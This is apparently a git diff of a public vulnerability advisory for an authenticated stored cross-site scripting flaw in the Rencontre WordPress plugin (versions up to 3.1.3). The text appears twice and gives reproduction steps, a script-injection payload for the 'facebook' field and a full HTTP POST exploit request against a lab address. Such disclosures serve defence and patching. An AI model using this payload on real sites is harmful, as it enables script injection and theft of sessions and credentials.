sathishshan · August 14, 2019 04:03 · boiteasite · Nov 5, 2019
diff --git a/#0 Auth_Stored_XSS.txt b/#0 Auth_Stored_XSS.txt
 # Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
 # Date: 03/08/2019
 # Exploit Author: Sathishshan
 # Version: <= 3.1.3
 # Vendor Homepage: Recontre
 # Software Link: https://wordpress.org/plugins/rencontre/
 # Tested on: Ubuntu-server 18.0.* OS
 # Category : Webapps

 # Description

 A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

 # Reproduction Steps:

 1. Login in WordPress and go to Plugin page
 2. Under the "Framework for the Facebook Like button" there is a text area
 3. Enter/paste the payload & save

 # POC:
 Prameter: facebook
 Payload: </textarea></td><script>alert('XSS')</script>//
 Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

 # Exploit Request:

 POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
 Host: 192.168.144.128
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 231
 Connection: close
 Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
 Upgrade-Insecure-Requests: 1

 home=http%3A%2F%2F192.168.144.128%2Findex.php%2Fsample-page%2F&pays=AL&prison=8&avatar=1&msgdel=4&dead=1&hcron=1&facebook=%3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F%3C%2Ftextarea%3E%3C%2Ftd%3E

 # Impact:

 An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

 # Remediation:

 Uninstall the plugin until the vulnerability has been fixed by the developer.
	# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
	# Date: 03/08/2019
	# Exploit Author: Sathishshan
	# Version: <= 3.1.3
	# Vendor Homepage: Recontre
	# Software Link: https://wordpress.org/plugins/rencontre/
	# Tested on: Ubuntu-server 18.0.* OS
	# Category : Webapps

	# Description

	A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

	# Reproduction Steps:

	1. Login in WordPress and go to Plugin page
	2. Under the "Framework for the Facebook Like button" there is a text area
	3. Enter/paste the payload & save

	# POC:
	Prameter: facebook
	Payload: </textarea></td><script>alert('XSS')</script>//
	Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

	# Exploit Request:

	POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
	Host: 192.168.144.128
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 231
	Connection: close
	Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
	Upgrade-Insecure-Requests: 1

	home=http%3A%2F%2F192.168.144.128%2Findex.php%2Fsample-page%2F&pays=AL&prison=8&avatar=1&msgdel=4&dead=1&hcron=1&facebook=%3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F%3C%2Ftextarea%3E%3C%2Ftd%3E

	# Impact:

	An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

	# Remediation:

	Uninstall the plugin until the vulnerability has been fixed by the developer.